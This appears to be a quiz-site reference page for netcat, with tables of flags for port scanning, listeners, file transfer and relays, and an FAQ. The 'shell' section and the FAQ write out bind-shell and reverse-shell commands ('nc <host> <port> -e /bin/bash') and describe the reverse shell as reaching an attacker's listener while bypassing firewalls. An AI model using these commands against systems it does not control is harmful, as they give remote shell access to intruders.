CmdKeys LogoCommand Quiz

Netcat Command Practice

netcat opens raw TCP or UDP sockets — as a client, server, or scanner — with a single command and no daemon required. This track drills the flags that turn nc into a port scanner (-z), a persistent listener (-k), a UDP probe (-u), or one half of a file-transfer pipeline.

Command Reference

scan

CommandDescription
nc -zv <host> <start>-<end>Scan a port range with verbose output — prints a line for each port indicating open or refused.
nc -z <host> <start>-<end>Scan a range of TCP ports on a host, reporting which ports are open (zero I/O mode — no data sent).
nc -zvn <host> <start>-<end>Scan a port range without DNS resolution — faster scan using raw IP addresses.
nc -zvn <host> <port1> <port2> <port3>Probe a list of specific non-contiguous ports rather than a continuous range.
nc -zvn -w <seconds> <host> <start>-<end>Scan a port range with a per-connection timeout — prevents the scan from hanging on filtered ports.

listen

CommandDescription
nc -lv <port>Start a verbose TCP listener — prints the connecting client's address when a connection is accepted.
nc -l <port>Start a one-shot TCP listener on the given port — closes after the first client disconnects.
nc -kl <port>Keep the listener open and accept new connections after each client disconnects — does not exit after the first session.
nc -ul <port>Start a UDP listener on the given port instead of the default TCP.
nc -4 -l <port>Restrict the listener to IPv4 only — prevents nc from binding on the IPv6 wildcard address.

connect

CommandDescription
nc -v <host> <port>Connect to a host and print verbose connection status messages — confirms whether the connection succeeded or was refused.
nc <host> <port>Open a raw TCP connection to a host on the specified port.
nc -n <host> <port>Connect using a raw IP address without performing DNS resolution.
nc -w <seconds> <host> <port>Connect to a host and close the connection if no data is exchanged within the given timeout in seconds.
nc -u <host> <port>Send data over UDP instead of TCP — useful for testing UDP services or sending syslog messages.

shell

CommandDescription
nc <host> <port>Connect to a netcat chat server — stdin goes to the remote party and the remote party's output appears on stdout.
nc -lv <port>Start a simple raw TCP chat server — anything typed by either party is sent to the other over the connection.
echo "" | nc -zv -w <seconds> <host> <port>Send an empty string to a port to trigger a banner response from the service, using zero-I/O mode with a timeout.
nc -lv <port> -e /bin/bashBind a bash shell to a port so any connecting client gets an interactive shell — requires GNU nc or ncat (OpenBSD nc dropped -e).
nc <host> <port> -e /bin/bashConnect back to a listener and hand off a local bash shell — bypasses inbound firewall rules on the target. Requires GNU nc or ncat.

transfer

CommandDescription
nc <host> <port> < <file>Send a local file to a listening nc server by redirecting the file into stdin.
nc -lv <port> > <file>Listen for an incoming connection and write everything received into a local file.
nc -nv <host> <port> > <file>Connect to a listening nc server and write everything received to a local file.
nc -lv <port> < <file>Serve a file from a listener — any client that connects receives the file's contents on stdout.
tar -cvf - <dir> | nc -l <port>Archive a directory and stream it over the network — the client receives and extracts with nc piped into tar.
nc -n <host> <port> | tar -xvf -Connect to a server streaming a tar archive and extract the directory contents on the fly.

proxy

CommandDescription
nc -6 -l <port>Start a listener bound to IPv6 only — useful when probing IPv6-only or dual-stack services.
nc -l <port1> | nc <host> <port2>Create a one-way port relay: incoming connections on port1 have their data forwarded to host:port2.
nc -lp <port1> -c "nc <host> <port2>"Use -c to spawn a second nc as a subprocess, creating a bidirectional port relay (requires GNU nc or ncat).
mkfifo /tmp/pipe && nc -l <port1> < /tmp/pipe | nc <host> <port2> > /tmp/pipeCreate a bidirectional TCP relay using a named FIFO so data flows in both directions between two nc instances.

Key Use Cases

  • Check which ports are open on a host by scanning a range with -z
  • Stand up a one-shot TCP listener to receive a file piped from another machine
  • Send a raw HTTP request to a web server to grab its banner
  • Forward traffic from one local port to another using a pipe between two nc processes
  • Test UDP reachability on a service port without a dedicated UDP client
  • Keep a listener alive across repeated connections with -k for repeated testing

Frequently Asked Questions

What is the difference between nc -l and nc -lp?

In OpenBSD netcat, -l puts nc into listen mode and the port can be given as the final positional argument (nc -l 8080) or via -p (nc -lp 8080). Both forms are equivalent; -lp is the traditional style seen in older scripts.

What does -z do in netcat?

-z (zero I/O) puts nc into port-scan mode: it attempts to connect to each port in the range and reports success or failure without sending any data. Combine with -v for verbose output and -n to skip DNS.

Why use -n with netcat port scans?

-n disables DNS resolution, so nc uses raw IP addresses instead of performing a hostname lookup for each connection attempt. This dramatically speeds up range scans (e.g., nc -zvn 192.168.1.1 1-1024).

What is the difference between a forward shell and a reverse shell with netcat?

In a forward shell, the server listens (nc -l 8000 -e /bin/bash) and the client connects to get a shell. In a reverse shell, the client connects back to the attacker's listener (nc <host> 8000 -e /bin/bash), bypassing inbound firewall rules. Note: -e requires GNU nc or ncat; OpenBSD nc dropped it.

Ready to master Netcat commands?

Test your muscle memory with our spaced-repetition quiz system. Free forever.

Start Practice Now →